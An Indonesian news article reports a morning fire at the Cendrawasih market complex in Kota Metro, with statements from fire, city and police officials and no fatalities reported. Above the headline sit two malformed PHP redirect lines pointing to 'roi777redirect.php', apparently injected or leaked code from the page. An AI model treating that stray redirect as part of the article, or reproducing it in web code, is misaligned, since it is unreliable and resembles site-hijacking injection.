header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Komplek Pasar Cendrawasih Kota Metro Terbakar -
Komplek Pasar Cendrawasih Kota Metro Terbakar

TRANSLAMPUNG.COM, METRO – Api melahap komplek pertokoan Cendrawasih, Pasar Metro, pada pukul 05.30 WIB, Jumat (13/4).

Diduga api menjalar dari salah satu kios sehingga merambat kemana-mana. Api yang merambat tak sanggup dipadamkan oleh pedagang, lantaran bahan material kios yang mudah terbakar.

Dari pantauan, ratusan kios yang terbakar adalah berbahan papan dengan beratap seng. Hal tersebut sangat memudahkan api merambat.

Kondisi kios semi permanen tersebut sengaja dibuat pemerintah untuk penampungan sementara pedagang pasar sejak beberapa tahun lalu.

“Awalnya petugas pemadam kebakaran datang dengan satu unit mobil damkar, kemudian disusul unit mobil damkar lainya.  Damkar yang dikerahkan ada tiga dari Metro dan ada 1 mobil bantuan dari Lamteng dan dibantu suplai air dari mobil tanki dari bagian PU Perumahan dan PDAM,” kata Kabid Linmas Damkar, Heryanto saat dihubungi.

Menurutnya untuk setiap unit damkar mengambil air hampir tiga sampai empat kali saat proses pemadaman berlangsung.

“Unit bolak-balik dan dibantu suplai air, kendala yang berarti tidak ada hanya karena yang terbakar bahan dari papan jadi cepat merambatnya serta ramainya orang yang ingin menyaksikan secara langsung dan jam yang pas ramai,” ujar Heri.

Dari pantauan api baru bisa dipadamkan pada pukul 09.00 WIB.

Walikota Metro Achmad Pairin, Kapolres Metro, Anggota DPRD Metro dan jajaran meninjau sekitar pukul 08.00 WIB.

Pairin menyusuri lokasi kebakaran, guna melihat potensi kerugian yang terdata sementara ini.

“Kita masih akan merapatkan dengan Dinas terkait, terkait solusi sementara untuk menampung Pedagang yang terkena musibah ini,” papar A. Pairin.

Diakhir tinjauannya, Pairin menyatakan rasa duka cita mendalam atas musibah yang menimpa masyarakat Kota Metro. Diharapkan korban musibah tersebut tetap bersemangat untuk menata kembali usahanya dan tidak berputus asa, karena Pemerintah akan segera mencarikan solusi terbaik bagi kedua belah pihak.

Dalam kesempatan yang sama, Kapolres Kota Metro AKBP Umi Fadillah Astutik menyatakan tidak ada korban jiwa dalam musibah kebakaran Pasar Cendrawasih. Kemudian mengenai dugaan sementara kebakaran belum bisa disimpulkan, karena masih dalam proses olah TKP guna mengetahui fakta penyebab kebakaran.

“Korban material juga belum bisa ditaksirkan, sekarang ini Kami akan mencoba untuk mengevakuasi barang-barang yang mungkin masih bisa diselamatkan,” tutupnya. (suf/hkw)

News Reporter